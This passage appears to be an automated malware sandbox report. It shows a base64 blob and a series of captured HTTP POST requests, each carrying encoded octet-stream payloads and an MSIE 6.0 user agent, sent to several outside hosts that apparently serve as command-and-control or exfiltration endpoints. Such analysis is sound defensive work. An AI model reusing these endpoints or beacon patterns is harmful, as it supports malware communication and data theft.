jBMJmfzNvf2Y5fgVp9HA3I+2w7KU2i3s8MZ14BgwIW3XzI3el18UwYQeTVUjceri5UFiTpBqopvOKc45Nvt3M8MoCCUFz+0MqDgivOtAx/n9CkvIpSvL0cMzHkp+Y6CQNRE9TAPzvRFKS3Zixi1jq7ENx0BZjZ4/A9Z2RUUjdH9MpasQFtbGk1waGKG8swWmPKavxb94Xn+ceDyZV9MRnnXL1c1f787wY9ZgchyeWN/hjIymFlFLcN31nv5W9CXI9MS8XQ7E85/Ck5Ns3BaTuGu2OroV6MjcBEwGAkeOMNPDrFEKm9LxyiaxKhBhGW26kWIMRkYiYKFSJGKB3qzhaQB+L1M6qDs5IR0kD4JJhY2c4U/HA4qTJqYyFrMSnczyl6zaKpM5Az5PnXlaZ5S0TKT30L92KuA+bc9SrEd8jnoclFhlffdpaTSDJ5AEuocaekKDGVhnUX5QVYJPxP77bbMlbU38fIichZpWfvFA3jHNtZYLYymiza3u6fWFD9FqnUUGnacBN5wEOwskNZHOQoAiu6tE4oFhK3mE78E=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheData Raw: 42 41 58 49 34 79 76 72 74 2f 33 34 52 75 65 6e 41 67 61 73 58 5a 54 65 70 53 7a 78 37 45 73 68 6a 2f 65 73 2f 35 58 74 33 55 50 4e 69 4a 36 34 74 71 48 74 74 76 4f 6e 31 32 69 30 34 67 59 35 41 46 44 50 76 44 58 73 77 51 35 30 65 42 2f 37 39 77 39 67 4b 54 52 68 32 62 33 66 72 67 49 69 56 4f 69 78 4f 67 59 32 36 30 75 4c 31 42 5a 38 4e 53 34 48 64 4f 6c 6d 4d 72 45 44 74 66 4a 66 37 53 74 54 52 35 4b 72 44 66 75 39 45 66 75 7a 49 44 77 45 41 4e 6a 66 58 32 6c 6a 74 48 47 64 48 42 6e 7a 6e 68 2b 6e 78 56 44 53 64 39 38 7a 7a 6c 59 55 52 34 35 57 2f 72 39 37 67 6c 61 6a 32 61 77 56 74 39 77 68 63 51 43 53 2f 42 49 68 59 51 43 73 52 6a 39 32 4f 72 50 31 73 34 75 6e 4e 64 73 55 50 55 56 39 78 35 79 65 59 44 48 72 67 2b 33 32 4e 6a 42 61 39 49 4f 4a 66 38 6f 69 64 58 67 53 2f 4b 58 76 2f 33 55 2b 2b 76 56 73 43 75 6a 34 30 6f 5a 59 30 78 7a 61 47 78 64 58 45 50 55 6a 48 42 49 65 33 75 37 7a 6a 4d 78 6b 34 7a 53 6c 32 33 49 33 6c 76 59 4b 72 65 50 69 57 35 6e 66 56 59 49 49 4c 48 34 31 4c 4d 62 67 68 44 35 74 7a 73 6a 6d 4e 73 6f 70 75 70 33 63 62 62 67 47 6d 4f 4f 56 65 37 57 49 41 75 39 75 4a 47 42 4a 53 6a 55 56 33 75 6f 42 67 59 63 71 47 67 4b 72 63 46 7a 78 4e 46 55 44 74 68 37 43 6c 4d 50 52 33 5a 4a 4a 42 70 69 30 79 32 56 37 6f 39 2f 4d 76 35 35 75 45 6b 45 69 4c 61 65 4e 4a 6b 78 51 6d 50 4b 42 77 68 35 35 50 44 33 2b 52 39 4f 35 69 34 57 75 62 52 50 61 4e 76 54 61 6a 38 44 36 74 59 4a 48 65 32 4c 77 32 72 30 54 77 35 53 7a 67 46 50 39 31 36 50 4a 48 2f 65 33 30 76 55 58 4f 73 5a 5a 39 50 67 66 32 45 7a 6b 64 30 4c 7a 43 51 68 64 36 50 77 5a 79 75 48 48 53 4e 32 4a 62 74 43 56 74 32 36 6b 46 6b 69 56 65 36 4e 67 64 74 4f 6c Data Ascii: BAXI4yvrt/34RuenAgasXZTepSzx7Eshj/es/5Xt3UPNiJ64tqHttvOn12i04gY5AFDPvDXswQ50eB/79w9gKTRh2b3frgIiVOixOgY260uL1BZ8NS4HdOlmMrEDtfJf7StTR5KrDfu9EfuzIDwEANjfX2ljtHGdHBnznh+nxVDSd98zzlYUR45W/r97glaj2awVt9whcQCS/BIhYQCsRj92OrP1s4unNdsUPUV9x5yeYDHrg+32NjBa9IOJf8oidXgS/KXv/3U++vVsCuj40oZY0xzaGxdXEPUjHBIe3u7zjMxk4zSl23I3lvYKrePiW5nfVYIILH41LMbghD5tzsjmNsopup3cbbgGmOOVe7WIAu9uJGBJSjUV3uoBgYcqGgKrcFzxNFUDth7ClMPR3ZJJBpi0y2V7o9/Mv55uEkEiLaeNJkxQmPKBwh55PD3+R9O5i4WubRPaNvTaj8D6tYJHe2Lw2r0Tw5SzgFP916PJH/e30vUXOsZZ9Pgf2Ezkd0LzCQhd6PwZyuHHSN2JbtCVt26kFkiVe6NgdtOl
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pdqhomes.comCache-Control: no-cacheData Raw: 4a 49 2f 4e 36 74 49 30 6e 2f 32 65 72 45 4b 2f 68 55 34 53 74 64 56 39 56 56 67 69 67 57 68 46 4a 68 67 52 56 45 38 6f 6e 46 35 74 77 53 75 2b 75 34 73 46 47 56 58 7a 68 2f 35 6f 78 46 47 4f 6f 55 4e 4a 43 65 38 76 34 56 78 50 42 73 4c 79 30 70 5a 50 66 48 4c 52 64 6a 50 69 79 37 2f 51 41 6b 34 55 4c 75 41 6b 39 7a 43 64 33 4a 53 67 34 6a 32 67 4c 56 58 69 78 4f 2b 64 49 41 7a 38 7a 34 76 59 4a 32 6c 41 64 37 6d 35 64 64 79 73 70 56 42 65 2b 5a 56 66 38 6d 4e 43 77 58 66 78 61 77 46 39 77 77 72 52 4c 62 4d 55 56 2b 56 35 6a 31 43 2b 53 52 54 79 63 50 67 41 79 6b 71 58 50 63 36 43 74 65 44 2b 49 31 6b 69 66 58 6a 48 50 30 44 61 4f 4b 36 7a 58 71 5a 6c 35 4f 71 6d 33 76 43 58 75 58 32 63 64 51 58 71 78 74 66 4c 65 38 2b 66 56 6f 36 49 6a 78 62 53 36 4c 31 4a 6d 53 78 45 4d 63 44 4b 48 69 73 30 59 31 47 59 4d 2f 32 74 6b 4b 48 6a 78 6f 52 4e 34 6f 6a 45 70 36 71 46 73 63 41 69 5a 7a 61 79 66 6e 4b 45 52 78 35 44 37 32 51 78 6e 57 4a 65 63 47 70 51 6e 54 69 5a 6c 32 55 68 7a 58 58 65 6e 58 2b 34 32 4c 44 4d 65 38 63 49 71 6f 38 71 49 56 47 37 67 4f 32 77 62 44 49 46 32 45 55 55 38 2f 38 64 75 39 2b 71 68 66 38 72 70 66 58 7a 5a 55 72 38 77 4e 78 76 4a 30 61 47 77 62 4b 5a 35 43 6f 37 69 5a 72 76 4f 66 4b 4a 38 35 67 52 4f 53 44 76 4e 5a 6d 6b 35 6e 7a 2f 4f 38 37 7a 44 33 6d 4e 56 57 6a 38 4c 6d 6b 73 57 64 69 4f 53 59 6f 58 44 5a 75 7a 38 32 6a 74 70 41 61 77 38 39 77 71 33 43 54 42 4c 61 65 6e 53 31 6c 7a 44 59 72 52 44 48 7a 70 64 41 2b 42 63 33 51 6c 48 51 47 34 58 65 74 49 31 48 42 57 4e 74 2f 59 4e 42 4d 2f 63 34 2f 56 57 64 31 6a 31 32 6a 4c 69 76 63 38 36 70 55 4f 77 55 33 47 61 70 77 3d Data Ascii: JI/N6tI0n/2erEK/hU4StdV9VVgigWhFJhgRVE8onF5twSu+u4sFGVXzh/5oxFGOoUNJCe8v4VxPBsLy0pZPfHLRdjPiy7/QAk4ULuAk9zCd3JSg4j2gLVXixO+dIAz8z4vYJ2lAd7m5ddyspVBe+ZVf8mNCwXfxawF9wwrRLbMUV+V5j1C+SRTycPgAykqXPc6CteD+I1kifXjHP0DaOK6zXqZl5Oqm3vCXuX2cdQXqxtfLe8+fVo6IjxbS6L1JmSxEMcDKHis0Y1GYM/2tkKHjxoRN4ojEp6qFscAiZzayfnKERx5D72QxnWJecGpQnTiZl2UhzXXenX+42LDMe8cIqo8qIVG7gO2wbDIF2EUU8/8du9+qhf8rpfXzZUr8wNxvJ0aGwbKZ5Co7iZrvOfKJ85gROSDvNZmk5nz/O87zD3mNVWj8LmksWdiOSYoXDZuz82jtpAaw89wq3CTBLaenS1lzDYrRDHzpdA+Bc3QlHQG4XetI1HBWNt/YNBM/c4/VWd1j12jLivc86pUOwU3Gapw=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 41 6d 70 4a 77 61 41 63 76 2f 31 37 6a 52 39 56 38 79 63 72 45 4e 4f 4d 77 78 73 49 69 4d 61 43 31 45 32 73 2f 70 46 45 50 4d 76 79 41 75 73 51 53 44 2b 4e 58 44 68 78 79 76 74 35 47 7a 6b 38 57 47 77 69 6e 74 54 77 64 32 43 6b 4d 67 72 38 77 61 76 31 76 50 4e 36 31 68 65 6d 53 6e 68 78 52 68 79 53 66 74 31 54 5a 57 41 6c 4b 31 70 69 5a 51 4b 78 30 2b 44 57 46 64 51 65 61 2b 71 64 56 38 66 30 6f 72 56 45 4e 72 43 62 78 45 38 43 6b 70 58 67 64 39 71 2f 77 5a 43 39 73 52 56 66 71 6e 58 4b 38 4f 33 4b 32 6d 6b 31 49 71 77 4e 44 71 67 2f 63 58 47 63 63 6f 4a 4a 57 35 42 52 46 70 4f 61 64 4e 51 59 39 4a 63 77 32 46 39 49 74 69 55 41 58 7a 42 59 55 71 46 6e 34 57 71 6a 43 38 2f 30 51 4d 66 42 33 4b 55 37 48 42 61 69 57 48 44 35 52 41 30 35 50 39 74 34 71 6b 7a 67 69 47 4a 2f 72 4b 35 4d 59 35 72 74 4e 36 68 76 74 49 4f 4e 6e 46 68 44 71 31 72 33 42 33 57 43 62 73 2b 76 54 70 64 38 36 4b 69 2b 36 68 48 37 70 39 48 75 5a 35 49 41 6f 52 48 47 4d 46 42 39 2b 6b 79 78 67 70 46 56 4a 50 61 55 78 73 6d 76 71 35 70 73 75 41 2f 44 78 2f 7a 47 42 6c 36 54 78 4e 54 51 79 4f 4d 46 39 45 57 59 5a 43 66 34 52 35 33 6b 74 49 6e 71 63 38 6c 54 64 77 2b 30 48 67 34 2f 6c 57 5a 51 44 62 54 4b 37 6e 72 43 4d 61 55 77 67 69 45 74 31 6f 59 32 34 74 72 69 76 6f 46 4d 75 45 6b 74 56 31 66 56 69 61 53 57 4a 59 63 2b 38 48 53 5a 41 34 44 5a 39 51 70 34 54 34 75 68 6e 32 51 72 6a 30 33 38 6b 6b 73 39 41 6b 39 30 45 64 5a 56 43 34 4c 43 73 49 61 49 78 48 48 68 48 7a 4d 44 35 61 49 71 6e 58 6e 73 79 39 6e 67 59 59 70 44 33 58 67 41 4b 75 67 79 35 4c 36 5a 76 7a 64 66 42 67 6d 52 34 68 77 42 44 33 74 5a 6f 75 73 58 51 36 6d 4d 6e 38 7a 67 48 53 52 4e 64 74 4e 6e 44 4a 4a 6d 68 4d 49 58 4c 4b 57 57 77 71 46 57 49 72 54 4a 4f 41 3d 3d Data Ascii: AmpJwaAcv/17jR9V8ycrENOMwxsIiMaC1E2s/pFEPMvyAusQSD+NXDhxyvt5Gzk8WGwintTwd2CkMgr8wav1vPN61hemSnhxRhySft1TZWAlK1piZQKx0+DWFdQea+qdV8f0orVENrCbxE8CkpXgd9q/wZC9sRVfqnXK8O3K2mk1IqwNDqg/cXGccoJJW5BRFpOadNQY9Jcw2F9ItiUAXzBYUqFn4WqjC8/0QMfB3KU7HBaiWHD5RA05P9t4qkzgiGJ/rK5MY5rtN6hvtIONnFhDq1r3B3WCbs+vTpd86Ki+6hH7p9HuZ5IAoRHGMFB9+kyxgpFVJPaUxsmvq5psuA/Dx/zGBl6TxNTQyOMF9EWYZCf4R53ktInqc8lTdw+0Hg4/lWZQDbTK7nrCMaUwgiEt1oY24trivoFMuEktV1fViaSWJYc+8HSZA4DZ9Qp4T4uhn2Qrj038kks9Ak90EdZVC4LCsIaIxHHhHzMD5aIqnXnsy9ngYYpD3XgAKugy5L6ZvzdfBgmR4hwBD3tZousXQ6mMn8zgHSRNdtNnDJJmhMIXLKWWwqFWIrTJOA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 6c 62 46 79 6a 6a 62 47 78 66 33 66 56 4a 6e 72 6b 59 69 35 52 39 6c 6f 36 78 64 57 47 41 32 76 79 76 56 66 63 77 6d 77 37 7a 64 4e 48 45 4a 72 65 66 52 31 45 66 4f 31 58 45 63 67 69 50 4d 6b 37 57 62 62 56 42 71 76 4e 75 6d 4e 4d 63 69 73 4a 50 38 33 4c 67 42 52 4b 65 45 5a 6d 61 55 2f 48 2b 46 5a 57 42 74 5a 32 49 62 69 76 6d 34 6d 70 71 45 31 39 52 58 73 46 66 79 39 50 61 6d 62 69 31 66 44 77 7a 35 47 67 63 6a 75 56 32 4d 44 45 76 45 33 72 45 66 34 63 66 4f 50 75 39 6e 61 7a 61 61 67 54 4f 72 41 4d 37 39 6d 6a 49 53 69 4b 76 68 52 4f 79 56 4a 44 49 35 37 70 4c 73 64 58 6c 6b 41 35 44 44 6f 5a 54 77 31 31 72 6b 52 36 58 51 62 34 68 4c 4b 30 7a 49 52 37 67 63 4d 49 53 6c 2b 39 64 71 64 6c 7a 4a 6f 45 58 55 37 62 76 65 6c 35 4b 79 45 50 32 58 65 53 46 42 53 52 30 50 62 2f 54 52 58 44 36 6c 76 6f 6b 48 44 69 4f 36 5a 32 4d 4a 44 57 77 4a 76 4f 36 76 41 47 47 76 76 6f 31 4a 65 4c 4e 32 2f 63 45 73 79 61 6c 54 42 64 46 61 69 6b 66 6c 66 4a 42 47 6a 34 45 39 61 68 56 59 2b 4a 4a 4d 75 44 35 6b 41 2b 51 4d 6c 2f 53 55 35 36 4d 73 54 73 6c 69 66 6e 30 4a 78 67 34 69 7a 53 66 59 36 6b 59 6e 2b 30 56 70 43 4e 6f 79 2b 4d 37 56 78 4b 77 50 6c 4d 41 68 6d 78 74 32 4d 30 72 6e 47 36 46 47 4e 71 37 79 75 6f 74 72 6a 32 77 77 55 38 63 6f 6a 79 50 73 66 64 78 79 69 2f 65 38 31 6e 6b 76 31 72 33 61 33 55 39 76 72 43 74 2b 4d 72 73 58 55 51 2b 6a 66 57 79 53 6d 45 6b 64 47 58 79 67 56 4e 53 73 33 66 38 30 5a 66 71 69 32 62 4b 41 51 4a 33 38 4d 50 4a 34 79 73 34 58 4b 54 31 35 69 34 37 39 67 66 55 32 6d 36 73 36 33 4b 74 35 52 4a 38 6b 50 51 58 59 7a 7a 52 46 4e 33 42 66 4b 31 66 69 58 57 61 32 70 69 67 3d 3d Data Ascii: lbFyjjbGxf3fVJnrkYi5R9lo6xdWGA2vyvVfcwmw7zdNHEJrefR1EfO1XEcgiPMk7WbbVBqvNumNMcisJP83LgBRKeEZmaU/H+FZWBtZ2Ibivm4mpqE19RXsFfy9Pambi1fDwz5GgcjuV2MDEvE3rEf4cfOPu9nazaagTOrAM79mjISiKvhROyVJDI57pLsdXlkA5DDoZTw11rkR6XQb4hLK0zIR7gcMISl+9dqdlzJoEXU7bvel5KyEP2XeSFBSR0Pb/TRXD6lvokHDiO6Z2MJDWwJvO6vAGGvvo1JeLN2/cEsyalTBdFaikflfJBGj4E9ahVY+JJMuD5kA+QMl/SU56MsTslifn0Jxg4izSfY6kYn+0VpCNoy+M7VxKwPlMAhmxt2M0rnG6FGNq7yuotrj2wwU8cojyPsfdxyi/e81nkv1r3a3U9vrCt+MrsXUQ+jfWySmEkdGXygVNSs3f80Zfqi2bKAQJ38MPJ4ys4XKT15i479gfU2m6s63Kt5RJ8kPQXYzzRFN3BfK1fiXWa2pig==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.valdal.comCache-Control: no-cacheData Raw: 41 6d 70 4a 77 61 41 63 76 2f 31 37 6a 52 39 56 38 79 63 72 45 4e 4f 4d 77 78 73 49 69 4d 61 43 31 45 32 73 2f 70 46 45 50 4d 76 79 41 75 73 51 53 44 2b 4e 58 44 68 78 79 76 74 35 47 7a 6b 38 57 47 77 69 6e 74 54 77 64 32 43 6b 4d 67 72 38 77 61 76 31 76 50 4e 36 31 68 65 6d 53 6e 68 78 52 68 79 53 66 74 31 54 5a 57 41 6c 4b 31 70 69 5a 51 4b 78 30 2b 44 57 46 64 51 65 61 2b 71 64 56 38 66 30 6f 72 56 45 4e 72 43 62 78 45 38 43 6b 70 58 67 64 39 71 2f 77 5a 43 39 73 52 56 66 71 6e 58 4b 38 4f 33 4b 32 6d 6b 31 49 71 77 4e 44 71 67 2f 63 58 47 63 63 6f 4a 4a 57 35 42 52 46 70 4f 61 64 4e 51 59 39 4a 63 77 32 46 39 49 74 69 55 41 58 7a 42 59 55 71 46 6e 34 57 71 6a 43 38 2f 30 51 4d 66 42 33 4b 55 37 48 42 61 69 57 48 44 35 52 41 30 35 50 39 74 34 71 6b 7a 67 69 47 4a 2f 72 4b 35 4d 59 35 72 74 4e 36 68 76 74 49 4f 4e 6e 46 68 44 71 31 72 33 42 33 57 43 62 73 2b 76 54 70 64 38 36 4b 69 2b 36 68 48 37 70 39 48 75 5a 35 49 41 6f 52 48 47 4d 46 42 39 2b 6b 79 78 67 70 46 56 4a 50 61 55 78 73 6d 76 71 35 70 73 75 41 2f 44 78 2f 7a 47 42 6c 36 54 78 4e 54 51 79 4f 4d 46 39 45 57 59 5a 43 66 34 52 35 33 6b 74 49 6e 71 63 38 6c 54 64 77 2b 30 48 67 34 2f 6c 57 5a 51 44 62 54 4b 37 6e 72 43 4d 61 55 77 67 69 45 74 31 6f 59 32 34 74 72 69 76 6f 46 4d 75 45 6b 74 56 31 66 56 69 61 53 57 4a 59 63 2b 38 48 53 5a 41 34 44 5a 39 51 70 34 54 34 75 68 6e 32 51 72 6a 30 33 38 6b 6b 73 39 41 6b 39 30 45 64 5a 56 43 34 4c 43 73 49 61 49 78 48 48 68 48 7a 4d 44 35 61 49 71 6e 58 6e 73 79 39 6e 67 59 59 70 44 33 58 67 41 4b 75 67 79 35 4c 36 5a 76 7a 64 66 42 67 6d 52 34 68 77 42 44 33 74 5a 6f 75 73 58 51 36 6d 4d 6e 38 7a 67 48 53 52 4e 64 74 4e 6e 44 4a 4a 6d 68 4d 49 58 4c 4b 57 57 77 71 46 57 49 72 54 4a 4f 41 3d 3d Data Ascii: AmpJwaAcv/17jR9V8ycrENOMwxsIiMaC1E2s/pFEPMvyAusQSD+NXDhxyvt5Gzk8WGwintTwd2CkMgr8wav1vPN61hemSnhxRhySft1TZWAlK1piZQKx0+DWFdQea+qdV8f0orVENrCbxE8CkpXgd9q/wZC9sRVfqnXK8O3K2mk1IqwNDqg/cXGccoJJW5BRFpOadNQY9Jcw2F9ItiUAXzBYUqFn4WqjC8/0QMfB3KU7HBaiWHD5RA05P9t4qkzgiGJ/rK5MY5rtN6hvtIONnFhDq1r3B3WCbs+vTpd86Ki+6hH7p9HuZ5IAoRHGMFB9+kyxgpFVJPaUxsmvq5psuA/Dx/zGBl6TxNTQyOMF9EWYZCf4R53ktInqc8lTdw+0Hg4/lWZQDbTK7nrCMaUwgiEt1oY24trivoFMuEktV1fViaSWJYc+8HSZA4DZ9Qp4T4uhn2Qrj038kks9Ak90EdZVC4LCsIaIxHHhHzMD5aIqnXnsy9ngYYpD3XgAKugy5L6ZvzdfBgmR4hwBD3tZousXQ6mMn8zgHSRNdtNnDJJmhMIXLKWWwqFWIrTJOA==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 540User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.medius.siCache-Control: no-cacheData Raw: 6c 62 46 79 6a 6a 62 47 78 66 33 66 56 4a 6e 72 6b 59 69 35 52 39 6c 6f 36 78 64 57 47 41 32 76 79 76 56 66 63 77 6d 77 37 7a 64 4e 48 45 4a 72 65 66 52 31 45 66 4f 31 58 45 63 67 69 50 4d 6b 37 57 62 62 56 42 71 76 4e 75 6d 4e 4d 63 69 73 4a 50 38 33 4c 67 42 52 4b 65 45 5a 6d 61 55 2f 48 2b 46 5a 57 42 74 5a 32 49 62 69 76 6d 34 6d 70 71 45 31 39 52 58 73 46 66 79 39 50 61 6d 62 69 31 66 44 77 7a 35 47 67 63 6a 75 56 32 4d 44 45 76 45 33 72 45 66 34 63 66 4f 50 75 39 6e 61 7a 61 61 67 54 4f 72 41 4d 37 39 6d 6a 49 53 69 4b 76 68 52 4f 79 56 4a 44 49 35 37 70 4c 73 64 58 6c 6b 41 35 44 44 6f 5a 54 77 31 31 72 6b 52 36 58 51 62 34 68 4c 4b 30 7a 49 52 37 67 63 4d 49 53 6c 2b 39 64 71 64 6c 7a 4a 6f 45 58 55 37 62 76 65 6c 35 4b 79 45 50 32 58 65 53 46 42 53 52 30 50 62 2f 54 52 58 44 36 6c 76 6f 6b 48 44 69 4f 36 5a 32 4d 4a 44 57 77 4a 76 4f 36 76 41 47 47 76 76 6f 31 4a 65 4c 4e 32 2f 63 45 73 79 61 6c 54 42 64 46 61 69 6b 66 6c 66 4a 42 47 6a 34 45 39 61 68 56 59 2b 4a 4a 4d 75 44 35 6b 41 2b 51 4d 6c 2f 53 55 35 36 4d 73 54 73 6c 69 66 6e 30 4a 78 67 34 69 7a 53 66 59 36 6b 59 6e 2b 30 56 70 43 4e 6f 79 2b 4d 37 56 78 4b 77 50 6c 4d 41 68 6d 78 74 32 4d 30 72 6e 47 36 46 47 4e 71 37 79 75 6f 74 72 6a 32 77 77 55 38 63 6f 6a 79 50 73 66 64 78 79 69 2f 65 38 31 6e 6b 76 31 72 33 61 33 55 39 76 72 43 74 2b 4d 72 73 58 55 51 2b 6a 66 57 79 53 6d 45 6b 64 47 58 79 67 56 4e 53 73 33 66 38 30 5a 66 71 69 32 62 4b 41 51 4a 33 38 4d 50 4a 34 79 73 34 58 4b 54 31 35 69 34 37 39 67 66 55 32 6d 36 73 36 33 4b 74 35 52 4a 38 6b 50 51 58 59 7a 7a 52 46 4e 33 42 66 4b 31 66 69 58 57 61 32 70 69 67 3d 3d Data Ascii: lbFyjjbGxf3fVJnrkYi5R9lo6xdWGA2vyvVfcwmw7zdNHEJrefR1EfO1XEcgiPMk7WbbVBqvNumNMcisJP83LgBRKeEZmaU/H+FZWBtZ2Ibivm4mpqE19RXsFfy9Pambi1fDwz5GgcjuV2MDEvE3rEf4cfOPu9nazaagTOrAM79mjISiKvhROyVJDI57pLsdXlkA5DDoZTw11rkR6XQb4hLK0zIR7gcMISl+9dqdlzJoEXU7bvel5KyEP2XeSFBSR0Pb/TRXD6lvokHDiO6Z2MJDWwJvO6vAGGvvo1JeLN2/cEsyalTBdFaikflfJBGj4E9ahVY+JJMuD5kA+QMl/SU56MsTslifn0Jxg4izSfY6kYn+0VpCNoy+M7VxKwPlMAhmxt2M0rnG6FGNq7yuotrj2wwU8cojyPsfdxyi/e81nkv1r3a3U9vrCt+MrsXUQ+jfWySmEkdGXygVNSs3f80Zfqi2bKAQJ38MPJ4ys4XKT15i479gfU2m6s63Kt5RJ8kPQXYzzRFN3BfK1fiXWa2pig==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 532User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.depalo.comCache-Control: no-cacheData Raw: 62 76 5a 71 66 61 41 34 78 66 30 43 51 4e 39 5a 38 35 4f 69 4f 39 4d 49 33 48 45 49 52 47 32 2f 31 47 46 6d 77 5a 37 41 6b 68 36 41 32 6e 37 39 35 56 4e 75 57 77 6e 33 63 6f 6a 54 4f 70 4a 51 48 47 67 6c 50 6f 4a 45 39 34 6a 2f 67 4f 41 63 35 38 74 4a 2f 66 46 4e 62 37 6b 78 57 30 32 69 4f 73 4e 4c 6b 79 53 79 66 35 4a 67 75 6f 64 54 79 59 6e 6d 35 72 34 76 2f 39 64 37 48 49 75 2f 49 7a 65 39 73 38 46 31 57 2b 45 4f 7a 39 50 6d 61 31 52 37 2b 64 58 51 73 39 4d 61 41 75 54 36 66 38 4d 6e 64 4c 6a 4d 6e 38 70 68 66 47 68 57 71 67 69 55 67 35 44 54 55 54 75 48 6b 4d 62 4a 65 66 49 62 49 42 31 34 53 72 38 6c 37 77 59 77 70 75 4b 77 44 43 32 38 65 64 6e 44 58 70 59 37 4a 74 61 50 56 39 78 6a 48 73 73 65 41 48 6f 79 70 6d 71 35 38 77 6c 4a 35 66 43 75 6a 53 38 51 6d 2b 48 64 77 54 42 32 57 51 72 68 79 6f 63 69 39 6f 37 32 72 57 4d 38 68 75 4e 57 6c 7a 37 46 32 4c 73 49 2f 7a 4f 37 5a 54 74 71 2b 56 58 34 4f 66 6e 34 7a 59 54 66 51 42 79 49 67 44 4c 46 31 75 39 59 46 69 47 31 69 2b 6c 6a 77 4e 30 74 37 50 75 6e 4d 36 42 54 75 6e 44 71 4c 4e 59 49 53 78 63 59 46 6d 42 34 57 47 46 58 4c 43 73 2f 73 4b 33 64 72 39 45 44 5a 5a 68 69 74 73 37 2b 5a 6a 71 48 64 75 62 31 4a 53 2f 62 46 63 31 72 4c 34 2b 55 77 52 43 33 2f 59 36 77 55 76 32 70 49 43 4c 55 58 45 49 44 57 6a 6f 7a 7a 72 69 65 36 33 47 4e 6c 51 2f 67 50 55 38 4b 55 45 79 76 6b 53 45 7a 32 69 74 48 51 44 6f 31 4a 34 5a 75 79 69 39 37 42 51 38 49 48 6b 77 58 6e 71 6d 73 4d 2b 68 47 5a 61 62 35 52 51 73 4a 69 36 41 6b 72 30 2b 61 53 4e 47 4b 74 62 66 6b 4c 6d 38 50 49 66 32 36 6a 56 78 4b 57 52 38 43 47 53 49 65 34 4e 75 61 Data Ascii: bvZqfaA4xf0CQN9Z85OiO9MI3HEIRG2/1GFmwZ7Akh6A2n795VNuWwn3cojTOpJQHGglPoJE94j/gOAc58tJ/fFNb7kxW02iOsNLkySyf5JguodTyYnm5r4v/9d7HIu/Ize9s8F1W+EOz9Pma1R7+dXQs9MaAuT6f8MndLjMn8phfGhWqgiUg5DTUTuHkMbJefIbIB14Sr8l7wYwpuKwDC28ednDXpY7JtaPV9xjHsseAHoypmq58wlJ5fCujS8Qm+HdwTB2WQrhyoci9o72rWM8huNWlz7F2LsI/zO7ZTtq+VX4Ofn4zYTfQByIgDLF1u9YFiG1i+ljwN0t7PunM6BTunDqLNYISxcYFmB4WGFXLCs/sK3dr9EDZZhits7+ZjqHdub1JS/bFc1rL4+UwRC3/Y6wUv2pICLUXEIDWjozzrie63GNlQ/gPU8KUEyvkSEz2itHQDo1J4Zuyi97BQ8IHkwXnqmsM+hGZab5RQsJi6Akr0+aSNGKtbfkLm8PIf26jVxKWR8CGSIe4Nua
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 552User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: _mcnc=1Data Raw: 42 41 58 49 34 79 76 72 74 2f 33 34 52 75 65 6e 41 67 61 73 58 5a 54 65 70 53 7a 78 37 45 73 68 6a 2f 65 73 2f 35 58 74 33 55 50 4e 69 4a 36 34 74 71 48 74 74 76 4f 6e 31 32 69 30 34 67 59 35 41 46 44 50 76 44 58 73 77 51 35 30 65 42 2f 37 39 77 39 67 4b 54 52 68 32 62 33 66 72 67 49 69 56 4f 69 78 4f 67 59 32 36 30 75 4c 31 42 5a 38 4e 53 34 48 64 4f 6c 6d 4d 72 45 44 74 66 4a 66 37 53 74 54 52 35 4b 72 44 66 75 39 45 66 75 7a 49 44 77 45 41 4e 6a 66 58 32 6c 6a 74 48 47 64 48 42 6e 7a 6e 68 2b 6e 78 56 44 53 64 39 38 7a 7a 6c 59 55 52 34 35 57 2f 72 39 37 67 6c 61 6a 32 61 77 56 74 39 77 68 63 51 43 53 2f 42 49 68 59 51 43 73 52 6a 39 32 4f 72 50 31 73 34 75 6e 4e 64 73 55 50 55 56 39 78 35 79 65 59 44 48 72 67 2b 33 32 4e 6a 42 61 39 49 4f 4a 66 38 6f 69 64 58 67 53 2f 4b 58 76 2f 33 55 2b 2b 76 56 73 43 75 6a 34 30 6f 5a 59 30 78 7a 61 47 78 64 58 45 50 55 6a 48 42 49 65 33 75 37 7a 6a 4d 78 6b 34 7a 53 6c 32 33 49 33 6c 76 59 4b 72 65 50 69 57 35 6e 66 56 59 49 49 4c 48 34 31 4c 4d 62 67 68 44 35 74 7a 73 6a 6d 4e 73 6f 70 75 70 33 63 62 62 67 47 6d 4f 4f 56 65 37 57 49 41 75 39 75 4a 47 42 4a 53 6a 55 56 33 75 6f 42 67 59 63 71 47 67 4b 72 63 46 7a 78 4e 46 55 44 74 68 37 43 6c 4d 50 52 33 5a 4a 4a 42 70 69 30 79 32 56 37 6f 39 2f 4d 76 35 35 75 45 6b 45 69 4c 61 65 